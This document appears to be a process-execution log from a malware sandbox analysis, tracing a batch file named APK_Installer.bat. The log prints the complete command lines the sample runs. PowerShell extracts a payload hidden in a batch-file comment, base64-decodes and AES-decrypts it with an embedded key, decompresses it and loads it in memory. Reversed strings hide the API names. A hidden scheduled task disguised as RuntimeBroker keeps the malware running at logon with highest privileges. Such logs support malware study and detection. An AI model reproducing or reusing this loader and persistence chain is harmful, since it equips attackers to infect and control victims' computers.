'')('C:\Users\Admin\Downloads\Classic_Tag\Classic_Tag\APK_Installer.bat').Split([Environment]::NewLine);foreach ($vYgMU in $Dgxmx) { if ($vYgMU.StartsWith(':: ')) { $IglnE=$vYgMU.Substring(3); break; }}$payloads_var=[string[]]$IglnE.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] 
(''));
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_690_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_690.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_690.vbs"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_690.bat" "
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('mPwRBm9qXJoyRc9bqNC0u+iAvpHRjwzR0xhhmQKq+YY='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('T+n2u+f+rr7kGOYnZCk7cA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $pNaoh=New-Object System.IO.MemoryStream(,$param_var); $QcgRK=New-Object System.IO.MemoryStream; $LEpGH=New-Object System.IO.Compression.GZipStream($pNaoh, [IO.Compression.CompressionMode]::Decompress); $LEpGH.CopyTo($QcgRK); $LEpGH.Dispose(); $pNaoh.Dispose(); $QcgRK.Dispose(); $QcgRK.ToArray();}function execute_function($param_var,$param2_var){ $kvhNG=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $ExMXI=$kvhNG.EntryPoint; $ExMXI.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Roaming\startup_str_690.bat';$Dgxmx=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Roaming\startup_str_690.bat').Split([Environment]::NewLine);foreach ($vYgMU in $Dgxmx) { if ($vYgMU.StartsWith(':: ')) { $IglnE=$vYgMU.Substring(3); break; }}$payloads_var=[string[]]$IglnE.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
Network
Files